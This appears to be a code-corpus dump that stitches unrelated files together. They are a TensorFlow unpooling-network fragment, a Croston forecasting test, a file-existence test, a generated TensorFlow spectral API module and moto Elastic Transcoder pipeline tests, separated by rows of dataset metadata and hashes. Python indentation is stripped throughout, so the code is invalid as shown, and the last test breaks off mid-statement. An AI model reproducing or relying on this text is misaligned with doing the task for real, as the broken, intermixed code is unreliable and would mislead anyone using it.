# #unpool2 = gen_nn_ops._max_pool_grad(conv2_2, pool2, unpool3, [1,2,2,1], [1,2,2,1],'VALID')
# unpool2 = gen_nn_ops._max_pool_grad(conv2_2, pool2, conv3_1D, [1,2,2,1], [1,2,2,1],'VALID')
# conv2_1D = tf.layers.conv2d(unpool2, filters=64, kernel_size=(1,1),
# padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
# print('unpool2', unpool2.get_shape())
# print('conv2_1D', conv2_1D.get_shape())
# #tf.summary.image('unpool2', unpool2)
#with tf.variable_scope('unpool1', reuse=reuse) as scope:#25
# #unpool1 = gen_nn_ops._max_pool_grad(conv1_2, pool1, unpool2, [1,2,2,1], [1,2,2,1],'VALID')
# unpool1 = gen_nn_ops._max_pool_grad(conv1_2, pool1, conv2_1D, [1,2,2,1], [1,2,2,1],'VALID')
# conv1_1D = tf.layers.conv2d(unpool1, filters=1, kernel_size=(1,1),
# padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
# print('unpool1', unpool1.get_shape())
# print('conv1_1D', conv1_1D.get_shape())
# tf.summary.image('conv1_1D', conv1_1D)
# print('conv1_1D.shape', conv1_1D.get_shape())
########################################################################################
with tf.variable_scope('unpool5', reuse=reuse) as scope:#14
#unpool5 = gen_nn_ops._max_pool_grad(idx_map, pool5, pool5, [1,3,3,1], [1,2,2,1],'VALID')
unpool5 = gen_nn_ops._max_pool_grad(conv5_3, pool5, pool5, [1,2,2,1], [1,2,2,1],'VALID')
if not reuse:
print('unpool5', unpool5.get_shape())
#tf.summary.image('unpool5', unpool5)
with tf.variable_scope('unpool4', reuse=reuse) as scope:#17
unpool4 = gen_nn_ops._max_pool_grad(conv4_3, pool4, unpool5, [1,2,2,1], [1,2,2,1],'VALID')
#conv4_1D = tf.layers.conv2d(unpool4, filters=256, kernel_size=(1,1),
# padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if not reuse:
print('unpool4', unpool4.get_shape())
#print('conv4_1D', conv4_1D.get_shape())
#tf.summary.image('unpool4', unpool4)
with tf.variable_scope('unpool3', reuse=reuse) as scope:#20
unpool3 = gen_nn_ops._max_pool_grad(conv3_3, pool3, unpool4, [1,2,2,1], [1,2,2,1],'VALID')
#unpool3 = gen_nn_ops._max_pool_grad(conv3_3, pool3, conv4_1D, [1,2,2,1], [1,2,2,1],'VALID')
#conv3_1D = tf.layers.conv2d(unpool3, filters=128, kernel_size=(1,1),
# padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if not reuse:
print('unpool3', unpool3.get_shape())
#print('conv3_1D', conv3_1D.get_shape())
#tf.summary.image('unpool3', unpool3)
with tf.variable_scope('unpool2', reuse=reuse) as scope:#23
unpool2 = gen_nn_ops._max_pool_grad(conv2_2, pool2, unpool3, [1,2,2,1], [1,2,2,1],'VALID')
#unpool2 = gen_nn_ops._max_pool_grad(conv2_2, pool2, conv3_1D, [1,2,2,1], [1,2,2,1],'VALID')
#conv2_1D = tf.layers.conv2d(unpool2, filters=64, kernel_size=(1,1),
# padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if not reuse:
print('unpool2', unpool2.get_shape())
#print('conv2_1D', conv2_1D.get_shape())
#tf.summary.image('unpool2', unpool2)
with tf.variable_scope('unpool1', reuse=reuse) as scope:#25
unpool1 = gen_nn_ops._max_pool_grad(conv1_2, pool1, unpool2, [1,2,2,1], [1,2,2,1],'VALID')
unpool1 = tf.reduce_max(unpool1, (3), keep_dims=True)
#unpool1 = gen_nn_ops._max_pool_grad(conv1_2, pool1, conv2_1D, [1,2,2,1], [1,2,2,1],'VALID')
#conv1_1D = tf.layers.conv2d(unpool1, filters=1, kernel_size=(1,1),
# padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if not reuse:
print('unpool1', unpool1.get_shape())
#print('conv1_1D', conv1_1D.get_shape())
#tf.summary.image('conv1_1D', conv1_1D)
#print('conv1_1D.shape', conv1_1D.get_shape())
feat = pool5
unpool = unpool1
return feat, unpool, grads_dict
def logits(feat1, feat2, reuse=False):
feat = tf.concat((feat1, feat2), 1)
print('logits_classif::feat.shape: ', feat.get_shape())
with tf.variable_scope('fc9', reuse=reuse) as scope:
fc9 = tf.nn.relu(tf.layers.dense(feat, 1000))
print('fc9', fc9.get_shape())
with tf.variable_scope('fc10', reuse=reuse) as scope:
fc10 = tf.nn.relu(tf.layers.dense(fc9, 2))
print('fc10', fc10.get_shape())
return fc10
def vgg_logits(pool5):
#### ReLU is killing your signal
with tf.variable_scope('fc6', reuse=reuse) as scope:#13
shape = int(np.prod(pool5.get_shape()[1:]))
#shape = pool5.get_shape().as_list()
#dim = np.prod(shape[1:])
#pool5_flat = tf.reshape(pool5, [-1, dim])
#print('pool5_flat', pool5_flat.get_shape())
in_ = tf.reshape(pool5, [-1, shape])
print('pool5_flat', in_.get_shape())
#fc6 = tf.nn.relu( tf.layers.dense(pool5_flat, 4096) )
fc6 = tf.nn.relu( tf.layers.dense(in_, 4096) )
print('fc6', fc6.get_shape())
with tf.variable_scope('fc7', reuse=reuse) as scope:#13
fc7 = tf.nn.relu(tf.layers.dense(fc6, 1000))
print('fc7', fc7.get_shape())
with tf.variable_scope('fc8', reuse) as scope:#13
fc8 = tf.nn.relu(tf.layers.dense(fc7, 1000))
print('fc8', fc8.get_shape())
return fc8
#def loss(feat1, feat2, labels):
# """Add Loss to all the trainable variables.
#
# Add summary for for "Loss" and "Loss/avg".
# Args:
# logits: Logits from inference().
# labels: Labels from distorted_inputs or inputs(). 2-D tensor
# of shape [batch_size, 1]
#
# Returns:
# Loss tensor of type float.
# """
# margin = 0
# #d_op = tf.reduce_sum(tf.square(feat1 - feat2), (1,2,3))
# #d_op = tf.reduce_sum(tf.square(feat1 - feat2), (1))
# #d = tf.nn.l2_loss(feat1 - feat2)# / (header.BATCH_SIZE ) #* header.IMAGE_SIZE)
# d_op = tf.reduce_sum(tf.abs(feat1 - feat2), (1,2,3)) # paper recommends L1 to avoid local minima
#
# print('d.shape: ', d_op.get_shape())
# print('labels.shape: ', labels.get_shape())
# #d_sqrt = tf.sqrt(d)
# #loss = labels * tf.square(tf.maximum(0., margin - d_sqrt)) + (1 - labels) * d
# #loss = (1-labels) * tf.maximum(0., margin - d) + labels * d
# loss_b = labels * d_op + (1 - labels) * (margin - d_op)
# print('loss_b.shape: ', loss_b.get_shape())
# #loss = tf.reduce_sum(loss_b)
# loss = tf.reduce_mean(loss_b)
# tf.summary.scalar('loss', loss)
#
# tf.add_to_collection('losses', loss)
# # The total loss is defined as the l2 loss plus all of the weight
# # decay terms (L2 loss).
# return tf.add_n(tf.get_collection('losses'), name='total_loss'), loss_b#, d_op
# #return tf.add_n(tf.get_collection('losses'), name='total_loss')
#
#def triplet_loss(feat1, feat2, feat3, args):
# """
# Triplet loss
# """
# margin = args.margin
# #d = tf.nn.l2_loss(feat1 - feat2)# / (header.BATCH_SIZE ) #* header.IMAGE_SIZE)
# dp = tf.reduce_sum(tf.abs(feat1 - feat2), (1,2,3)) # P example
# dn = tf.reduce_sum(tf.abs(feat1 - feat3), (1,2,3)) # N example
# dp_mean = tf.reduce_mean(dp)
# dn_mean = tf.reduce_mean(dn)
# tf.summary.scalar('dn', dn_mean)
# tf.summary.scalar('dp', dp_mean)
# loss_b = tf.maximum(0.0, margin + dp - dn)
# loss = tf.reduce_mean(loss_b)
# #print('dn.shape: ', dn.get_shape())
# #print('loss_b.shape: ', loss_b.get_shape())
# tf.summary.scalar('loss', loss)
#
# tf.add_to_collection('losses', loss)
# # The total loss is defined as the l2 loss plus all of the weight
# # decay terms (L2 loss).
# return tf.add_n(tf.get_collection('losses'), name='total_loss'), dp, dn
# #return tf.add_n(tf.get_collection('losses'), name='total_loss')
#def loss_classif(logits, labels):
# """Add Loss to all the trainable variables.
#
# Add summary for for "Loss" and "Loss/avg".
# Args:
# logits: Logits from inference().
# labels: Labels from distorted_inputs or inputs(). 2-D tensor
# of shape [batch_size, 1]
#
# Returns:
# Loss tensor of type float.
# """
# labels = tf.cast(labels, tf.int64)
# loss = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=labels))
# correct_prediction = tf.equal(tf.argmax(logits, 1), labels)
# acc = tf.reduce_mean(tf.cast(correct_prediction,tf.float32))
#
# tf.summary.scalar('loss', loss)
# tf.summary.scalar('acc', acc)
# tf.add_to_collection('losses', loss)
# return tf.add_n(tf.get_collection('losses'), name='total_loss'), acc
#
#def _add_loss_summaries(total_loss):
# """Add summaries for losses in CIFAR-10 model.
#
# Generates moving average for all losses and associated summaries for
# visualizing the performance of the network.
#
# Args:
# total_loss: Total loss from loss().
# Returns:
# loss_averages_op: op for generating moving averages of losses.
# """
# # Compute the moving average of all individual losses and the total loss.
# loss_averages = tf.train.ExponentialMovingAverage(0.9, name='avg')
# losses = tf.get_collection('losses')
# loss_averages_op = loss_averages.apply(losses + [total_loss])
#
# # Attach a scalar summary to all individual losses and the total loss; do the
# # same for the averaged version of the losses.
# for l in losses + [total_loss]:
# # Name each loss as '(raw)' and name the moving average version of the loss
# # as the original loss name.
# tf.summary.scalar(l.op.name +' (raw)', l)
# tf.summary.scalar(l.op.name, loss_averages.average(l))
#
# return loss_averages_op
#
#
#def train(total_loss, global_step, args):
# """Train CIFAR-10 model.
# Create an optimizer and apply to all trainable variables. Add moving
# average for all trainable variables.
# Args:
# total_loss: Total loss from loss().
# global_step: Integer Variable counting the number of training steps
# processed.
# Returns:
# train_op: op for training.
# """
# # Generate moving averages of all losses and associated summaries.
# loss_averages_op = _add_loss_summaries(total_loss)
#
# #var_to_train = tf.trainable_variables()
# #print('\nvar to train')
# #for var in var_to_train:
# # print(var.op.name)
#
# # Compute gradients.
# with tf.control_dependencies([loss_averages_op]):
# opt = tf.train.AdamOptimizer(args.lr, args.adam_b1, args.adam_b2, args.adam_eps)
#
# # TODO BN
# update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS) #line for BN
# with tf.control_dependencies(update_ops):
# grads = opt.compute_gradients(total_loss, var_list=tf.trainable_variables())
# apply_gradient_op = opt.apply_gradients(grads, global_step=global_step)
#
# # no BN
# # grads = opt.compute_gradients(total_loss, var_list=tf.trainable_variables())
# #apply_gradient_op = opt.apply_gradients(grads, global_step=global_step)
#
# # Add histograms for trainable variables.
# for var in tf.trainable_variables():
# tf.summary.histogram(var.op.name, var)
#
# # Add histograms for gradients.
# for grad, var in grads:
# if grad is not None:
# tf.summary.histogram(var.op.name + '/gradients', grad)
#
# # Track the moving averages of all trainable variables.
# variable_averages = tf.train.ExponentialMovingAverage(args.moving_average_decay, global_step)
#
# with tf.control_dependencies([apply_gradient_op]):
# variables_averages_op = variable_averages.apply(tf.trainable_variables())
# #train_op = tf.no_op(name='train')
#
# return variables_averages_op #train_op
| 50.799695
| 143
| 0.640483
| 14,797
| 99,923
| 4.110901
| 0.025073
| 0.083003
| 0.046853
| 0.009469
| 0.925315
| 0.920712
| 0.910898
| 0.9047
| 0.893883
| 0.888129
| 0
| 0.071498
| 0.201455
| 99,923
| 1,966
| 144
| 50.825534
| 0.690838
| 0.373968
| 0
| 0.833
| 0
| 0
| 0.059548
| 0.00116
| 0
| 0
| 0
| 0.000509
| 0
| 1
| 0.01
| false
| 0
| 0.015
| 0
| 0.035
| 0.103
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
49a841d3faee167848d174ee806e9b2223d4869b
| 156
|
py
|
Python
|
tests/croston/croston_test_1_legacy_linear_trend.py
|
shaido987/pyaf
|
b9afd089557bed6b90b246d3712c481ae26a1957
|
[
"BSD-3-Clause"
] | 377
|
2016-10-13T20:52:44.000Z
|
2022-03-29T18:04:14.000Z
|
tests/croston/croston_test_1_legacy_linear_trend.py
|
ysdede/pyaf
|
b5541b8249d5a1cfdc01f27fdfd99b6580ed680b
|
[
"BSD-3-Clause"
] | 160
|
2016-10-13T16:11:53.000Z
|
2022-03-28T04:21:34.000Z
|
tests/croston/croston_test_1_legacy_linear_trend.py
|
ysdede/pyaf
|
b5541b8249d5a1cfdc01f27fdfd99b6580ed680b
|
[
"BSD-3-Clause"
] | 63
|
2017-03-09T14:51:18.000Z
|
2022-03-27T20:52:57.000Z
|
# from .croston import croston_tests as crost
import tests.croston.croston_tests as crost
crost.create_model(N = 365 , croston_type = None, iTrend = True)
| 31.2
| 64
| 0.782051
| 24
| 156
| 4.916667
| 0.583333
| 0.20339
| 0.237288
| 0.322034
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.022388
| 0.141026
| 156
| 4
| 65
| 39
| 0.858209
| 0.275641
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
b702763e3b7667148cb5f2e2bf0aba32402878e9
| 157
|
py
|
Python
|
tests/test_files_exist.py
|
maxachis/food-access-map-data
|
40fbb7bbb2434f0a177237dd2fee1e9f36138a12
|
[
"MIT"
] | null | null | null |
tests/test_files_exist.py
|
maxachis/food-access-map-data
|
40fbb7bbb2434f0a177237dd2fee1e9f36138a12
|
[
"MIT"
] | null | null | null |
tests/test_files_exist.py
|
maxachis/food-access-map-data
|
40fbb7bbb2434f0a177237dd2fee1e9f36138a12
|
[
"MIT"
] | 1
|
2021-01-24T16:18:49.000Z
|
2021-01-24T16:18:49.000Z
|
#test_files_exist.py
import os.path
from os import path
def test_merge_duplicates_exists():
assert path.isfile("data_prep_scripts/auto_merge_duplicates.R")
| 26.166667
| 64
| 0.840764
| 26
| 157
| 4.730769
| 0.730769
| 0.243902
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.076433
| 157
| 6
| 64
| 26.166667
| 0.848276
| 0.121019
| 0
| 0
| 0
| 0
| 0.297101
| 0.297101
| 0
| 0
| 0
| 0
| 0.25
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
b71a6d0a3a3a4a238c2b2d25c9c762ce19b4653e
| 1,332
|
py
|
Python
|
python3/lib/python3.6/site-packages/tensorflow/_api/v1/spectral/__init__.py
|
TruongThuyLiem/keras2tensorflow
|
726f2370160701081cb43fbd8b56154c10d7ad63
|
[
"MIT"
] | 3
|
2020-10-12T15:47:01.000Z
|
2022-01-14T19:51:26.000Z
|
python3/lib/python3.6/site-packages/tensorflow/_api/v1/spectral/__init__.py
|
TruongThuyLiem/keras2tensorflow
|
726f2370160701081cb43fbd8b56154c10d7ad63
|
[
"MIT"
] | null | null | null |
python3/lib/python3.6/site-packages/tensorflow/_api/v1/spectral/__init__.py
|
TruongThuyLiem/keras2tensorflow
|
726f2370160701081cb43fbd8b56154c10d7ad63
|
[
"MIT"
] | 2
|
2020-08-03T13:02:06.000Z
|
2020-11-04T03:15:44.000Z
|
# This file is MACHINE GENERATED! Do not edit.
# Generated by: tensorflow/python/tools/api/generator/create_python_api.py script.
"""Public API for tf.spectral namespace.
"""
from __future__ import print_function as _print_function
from tensorflow.python.ops.gen_spectral_ops import fft
from tensorflow.python.ops.gen_spectral_ops import fft2d
from tensorflow.python.ops.gen_spectral_ops import fft3d
from tensorflow.python.ops.gen_spectral_ops import ifft
from tensorflow.python.ops.gen_spectral_ops import ifft2d
from tensorflow.python.ops.gen_spectral_ops import ifft3d
from tensorflow.python.ops.signal.dct_ops import dct
from tensorflow.python.ops.signal.dct_ops import idct
from tensorflow.python.ops.signal.fft_ops import irfft
from tensorflow.python.ops.signal.fft_ops import irfft2d
from tensorflow.python.ops.signal.fft_ops import irfft3d
from tensorflow.python.ops.signal.fft_ops import rfft
from tensorflow.python.ops.signal.fft_ops import rfft2d
from tensorflow.python.ops.signal.fft_ops import rfft3d
del _print_function
import sys as _sys
from tensorflow.python.util import deprecation_wrapper as _deprecation_wrapper
if not isinstance(_sys.modules[__name__], _deprecation_wrapper.DeprecationWrapper):
_sys.modules[__name__] = _deprecation_wrapper.DeprecationWrapper(
_sys.modules[__name__], "spectral")
| 42.967742
| 83
| 0.843093
| 196
| 1,332
| 5.454082
| 0.280612
| 0.239476
| 0.280636
| 0.301216
| 0.654818
| 0.654818
| 0.654818
| 0.654818
| 0.106642
| 0
| 0
| 0.006579
| 0.087087
| 1,332
| 30
| 84
| 44.4
| 0.872533
| 0.123123
| 0
| 0
| 1
| 0
| 0.006897
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.809524
| 0
| 0.809524
| 0.095238
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
3fb036a6f63afd6163209a65c5ec2bdc774c1a91
| 15,016
|
py
|
Python
|
tests/test_elastictranscoder/test_elastictranscoder.py
|
oakbramble/moto
|
6350d8ec4c59eaf12b83385b6acd386e5c2f5593
|
[
"Apache-2.0"
] | null | null | null |
tests/test_elastictranscoder/test_elastictranscoder.py
|
oakbramble/moto
|
6350d8ec4c59eaf12b83385b6acd386e5c2f5593
|
[
"Apache-2.0"
] | 1
|
2021-09-13T04:39:03.000Z
|
2021-09-13T04:39:03.000Z
|
tests/test_elastictranscoder/test_elastictranscoder.py
|
oakbramble/moto
|
6350d8ec4c59eaf12b83385b6acd386e5c2f5593
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import unicode_literals
from botocore.exceptions import ClientError
import boto3
import sure # noqa
import pytest
from moto import mock_elastictranscoder
from moto.core import ACCOUNT_ID
@mock_elastictranscoder
def test_create_simple_pipeline():
region = "us-east-1"
client = boto3.client("elastictranscoder", region_name=region)
role = create_role_name("nonexistingrole")
response = client.create_pipeline(
Name="testpipeline",
InputBucket="inputtest",
OutputBucket="outputtest",
Role=role,
)
response["ResponseMetadata"]["HTTPStatusCode"].should.equal(201)
pipeline = response["Pipeline"]
pipeline.should.have.key("Id")
pipeline.should.have.key("Name").being.equal("testpipeline")
pipeline.should.have.key("Arn").being.equal(
"arn:aws:elastictranscoder:{}:{}:pipeline/{}".format(
region, ACCOUNT_ID, pipeline["Id"]
)
)
pipeline.should.have.key("Status").being.equal("Active")
pipeline.should.have.key("InputBucket").being.equal("inputtest")
pipeline.should.have.key("OutputBucket").being.equal("outputtest")
pipeline.should.have.key("Role").being.equal(role)
pipeline.should.have.key("Notifications").being.equal(
{"Progressing": "", "Completed": "", "Warning": "", "Error": ""}
)
pipeline.should.have.key("ContentConfig")
pipeline["ContentConfig"].should.have.key("Bucket").being.equal("outputtest")
pipeline["ContentConfig"].should.have.key("Permissions").being.equal([])
pipeline.should.have.key("ThumbnailConfig")
pipeline["ThumbnailConfig"].should.have.key("Bucket").being.equal("outputtest")
pipeline["ThumbnailConfig"].should.have.key("Permissions").being.equal([])
response.should.have.key("Warnings").being.equal([])
@mock_elastictranscoder
def test_create_pipeline_with_content_config():
region = "us-east-1"
client = boto3.client("elastictranscoder", region_name=region)
role = create_role_name("nonexistingrole")
response = client.create_pipeline(
Name="testpipeline",
InputBucket="inputtest",
ContentConfig={"Bucket": "outputtest"},
ThumbnailConfig={"Bucket": "outputtest"},
Role=role,
)
response["ResponseMetadata"]["HTTPStatusCode"].should.equal(201)
pipeline = response["Pipeline"]
pipeline.should.have.key("Id")
pipeline.should.have.key("Name").being.equal("testpipeline")
pipeline.should.have.key("Arn").being.equal(
"arn:aws:elastictranscoder:{}:{}:pipeline/{}".format(
region, ACCOUNT_ID, pipeline["Id"]
)
)
pipeline.should.have.key("Status").being.equal("Active")
pipeline.should.have.key("InputBucket").being.equal("inputtest")
pipeline.should.have.key("OutputBucket").being.equal("outputtest")
pipeline.should.have.key("Role").being.equal(role)
pipeline.should.have.key("Notifications").being.equal(
{"Progressing": "", "Completed": "", "Warning": "", "Error": ""}
)
pipeline.should.have.key("ContentConfig")
pipeline["ContentConfig"].should.have.key("Bucket").being.equal("outputtest")
pipeline["ContentConfig"].should.have.key("Permissions").being.equal([])
pipeline.should.have.key("ThumbnailConfig")
pipeline["ThumbnailConfig"].should.have.key("Bucket").being.equal("outputtest")
pipeline["ThumbnailConfig"].should.have.key("Permissions").being.equal([])
@mock_elastictranscoder
def test_create_pipeline_with_outputbucket_and_content_config():
region = "us-east-1"
client = boto3.client("elastictranscoder", region_name=region)
role = create_role_name("nonexistingrole")
with pytest.raises(ClientError) as ex:
client.create_pipeline(
Name="testpipeline",
InputBucket="inputtest",
OutputBucket="outputtest",
ContentConfig={"Bucket": "configoutputtest"},
Role=role,
)
err = ex.value.response["Error"]
err["Code"].should.equal("ValidationException")
err["Message"].should.equal(
"[OutputBucket and ContentConfig are mutually exclusive.]"
)
@mock_elastictranscoder
def test_create_pipeline_without_thumbnail_config():
region = "us-east-1"
client = boto3.client("elastictranscoder", region_name=region)
role = create_role_name("nonexistingrole")
with pytest.raises(ClientError) as ex:
client.create_pipeline(
Name="testpipeline",
InputBucket="inputtest",
ContentConfig={"Bucket": "outputtest"},
Role=role,
)
err = ex.value.response["Error"]
err["Code"].should.equal("ValidationException")
err["Message"].should.equal(
"[ThumbnailConfig:Bucket is not allowed to be null if ContentConfig is specified.]"
)
@mock_elastictranscoder
def test_create_pipeline_without_role():
client = boto3.client("elastictranscoder", region_name="us-east-1")
with pytest.raises(ClientError) as ex:
client.create_pipeline(Name="testpipeline", InputBucket="inputtest", Role="")
err = ex.value.response["Error"]
err["Code"].should.equal("ValidationException")
err["Message"].should.equal("Role cannot be blank")
@mock_elastictranscoder
def test_create_pipeline_with_invalid_role():
client = boto3.client("elastictranscoder", region_name="us-east-1")
with pytest.raises(ClientError) as ex:
client.create_pipeline(
Name="testpipeline", InputBucket="inputtest", Role="asdf"
)
err = ex.value.response["Error"]
err["Code"].should.equal("ValidationException")
err["Message"].should.equal("Role ARN is invalid: asdf")
@mock_elastictranscoder
def test_create_pipeline_without_output():
client = boto3.client("elastictranscoder", region_name="us-east-1")
with pytest.raises(ClientError) as ex:
client.create_pipeline(
Name="testpipeline",
InputBucket="inputtest",
Role=create_role_name("nonexistingrole"),
)
err = ex.value.response["Error"]
err["Code"].should.equal("ValidationException")
err["Message"].should.equal(
"[OutputBucket and ContentConfig:Bucket are not allowed to both be null.]"
)
@mock_elastictranscoder
def test_list_pipelines():
region = "us-east-1"
client = boto3.client("elastictranscoder", region_name=region)
role = create_role_name("nonexistingrole")
client.create_pipeline(
Name="testpipeline",
InputBucket="inputtest",
OutputBucket="outputtest",
Role=role,
)
response = client.list_pipelines()
response["ResponseMetadata"]["HTTPStatusCode"].should.equal(200)
response.should.have.key("Pipelines").being.length_of(1)
pipeline = response["Pipelines"][0]
pipeline.should.have.key("Id")
pipeline.should.have.key("Name").being.equal("testpipeline")
pipeline.should.have.key("Arn").being.equal(
"arn:aws:elastictranscoder:{}:{}:pipeline/{}".format(
region, ACCOUNT_ID, pipeline["Id"]
)
)
pipeline.should.have.key("Status").being.equal("Active")
pipeline.should.have.key("InputBucket").being.equal("inputtest")
pipeline.should.have.key("OutputBucket").being.equal("outputtest")
pipeline.should.have.key("Role").being.equal(role)
pipeline.should.have.key("Notifications").being.equal(
{"Progressing": "", "Completed": "", "Warning": "", "Error": ""}
)
pipeline.should.have.key("ContentConfig")
pipeline["ContentConfig"].should.have.key("Bucket").being.equal("outputtest")
pipeline["ContentConfig"].should.have.key("Permissions").being.equal([])
pipeline.should.have.key("ThumbnailConfig")
pipeline["ThumbnailConfig"].should.have.key("Bucket").being.equal("outputtest")
pipeline["ThumbnailConfig"].should.have.key("Permissions").being.equal([])
@mock_elastictranscoder
def test_read_pipeline():
region = "us-east-1"
client = boto3.client("elastictranscoder", region_name=region)
role = create_role_name("nonexistingrole")
pipeline = client.create_pipeline(
Name="testpipeline",
InputBucket="inputtest",
OutputBucket="outputtest",
Role=role,
)["Pipeline"]
response = client.read_pipeline(Id=pipeline["Id"])
response["ResponseMetadata"]["HTTPStatusCode"].should.equal(200)
response.should.have.key("Pipeline")
pipeline = response["Pipeline"]
pipeline.should.have.key("Id")
pipeline.should.have.key("Name").being.equal("testpipeline")
pipeline.should.have.key("Arn").being.equal(
"arn:aws:elastictranscoder:{}:{}:pipeline/{}".format(
region, ACCOUNT_ID, pipeline["Id"]
)
)
pipeline.should.have.key("Status").being.equal("Active")
pipeline.should.have.key("InputBucket").being.equal("inputtest")
pipeline.should.have.key("OutputBucket").being.equal("outputtest")
pipeline.should.have.key("Role").being.equal(role)
pipeline.should.have.key("Notifications").being.equal(
{"Progressing": "", "Completed": "", "Warning": "", "Error": ""}
)
pipeline.should.have.key("ContentConfig")
pipeline["ContentConfig"].should.have.key("Bucket").being.equal("outputtest")
pipeline["ContentConfig"].should.have.key("Permissions").being.equal([])
pipeline.should.have.key("ThumbnailConfig")
pipeline["ThumbnailConfig"].should.have.key("Bucket").being.equal("outputtest")
pipeline["ThumbnailConfig"].should.have.key("Permissions").being.equal([])
@mock_elastictranscoder
def test_read_unknown_pipeline_format():
region = "us-east-1"
client = boto3.client("elastictranscoder", region_name=region)
with pytest.raises(ClientError) as ex:
client.read_pipeline(Id="unknown-pipeline")
err = ex.value.response["Error"]
err["Code"].should.equal("ValidationException")
err["Message"].should.equal(
"1 validation error detected: Value 'unknown-pipeline' at 'id' failed to satisfy constraint: Member must satisfy regular expression pattern: ^\\d{13}-\\w{6}$"
)
@mock_elastictranscoder
def test_read_nonexisting_pipeline_format():
region = "us-east-1"
client = boto3.client("elastictranscoder", region_name=region)
pipeline_id = "0000000000000-abcdef"
with pytest.raises(ClientError) as ex:
client.read_pipeline(Id=pipeline_id)
err = ex.value.response["Error"]
err["Code"].should.equal("ResourceNotFoundException")
err["Message"].should.equal(
"The specified pipeline was not found: account={}, pipelineId={}.".format(
ACCOUNT_ID, pipeline_id
)
)
@mock_elastictranscoder
def test_update_pipeline_name():
region = "us-east-1"
client = boto3.client("elastictranscoder", region_name=region)
role = create_role_name("nonexistingrole")
pipeline = client.create_pipeline(
Name="testpipeline",
InputBucket="inputtest",
OutputBucket="outputtest",
Role=role,
)["Pipeline"]
response = client.update_pipeline(Id=pipeline["Id"], Name="newtestpipeline")
response["ResponseMetadata"]["HTTPStatusCode"].should.equal(200)
response.should.have.key("Pipeline")
pipeline = response["Pipeline"]
pipeline.should.have.key("Id")
pipeline.should.have.key("Name").being.equal("newtestpipeline")
pipeline.should.have.key("Arn").being.equal(
"arn:aws:elastictranscoder:{}:{}:pipeline/{}".format(
region, ACCOUNT_ID, pipeline["Id"]
)
)
pipeline.should.have.key("Status").being.equal("Active")
pipeline.should.have.key("InputBucket").being.equal("inputtest")
pipeline.should.have.key("OutputBucket").being.equal("outputtest")
pipeline.should.have.key("Role").being.equal(role)
pipeline.should.have.key("Notifications").being.equal(
{"Progressing": "", "Completed": "", "Warning": "", "Error": ""}
)
pipeline.should.have.key("ContentConfig")
pipeline["ContentConfig"].should.have.key("Bucket").being.equal("outputtest")
pipeline["ContentConfig"].should.have.key("Permissions").being.equal([])
pipeline.should.have.key("ThumbnailConfig")
pipeline["ThumbnailConfig"].should.have.key("Bucket").being.equal("outputtest")
pipeline["ThumbnailConfig"].should.have.key("Permissions").being.equal([])
@mock_elastictranscoder
def test_update_pipeline_input_and_role():
region = "us-east-1"
client = boto3.client("elastictranscoder", region_name=region)
role = create_role_name("nonexistingrole")
newrole = create_role_name("newrole")
pipeline = client.create_pipeline(
Name="testpipeline",
InputBucket="inputtest",
OutputBucket="outputtest",
Role=role,
)["Pipeline"]
response = client.update_pipeline(
Id=pipeline["Id"], InputBucket="inputtest2", Role=newrole
)
response["ResponseMetadata"]["HTTPStatusCode"].should.equal(200)
response.should.have.key("Pipeline")
pipeline = response["Pipeline"]
pipeline.should.have.key("Id")
pipeline.should.have.key("Name").being.equal("testpipeline")
pipeline.should.have.key("InputBucket").being.equal("inputtest2")
pipeline.should.have.key("Role").being.equal(newrole)
@mock_elastictranscoder
def test_update_pipeline_with_invalid_id():
region = "us-east-1"
client = boto3.client("elastictranscoder", region_name=region)
with pytest.raises(ClientError) as ex:
client.update_pipeline(Id="unknown-pipeline")
err = ex.value.response["Error"]
err["Code"].should.equal("ValidationException")
err["Message"].should.equal(
"1 validation error detected: Value 'unknown-pipeline' at 'id' failed to satisfy constraint: Member must satisfy regular expression pattern: ^\\d{13}-\\w{6}$"
)
@mock_elastictranscoder
def test_update_nonexisting_pipeline():
region = "us-east-1"
client = boto3.client("elastictranscoder", region_name=region)
pipeline_id = "0000000000000-abcdef"
with pytest.raises(ClientError) as ex:
client.read_pipeline(Id=pipeline_id)
err = ex.value.response["Error"]
err["Code"].should.equal("ResourceNotFoundException")
err["Message"].should.equal(
"The specified pipeline was not found: account={}, pipelineId={}.".format(
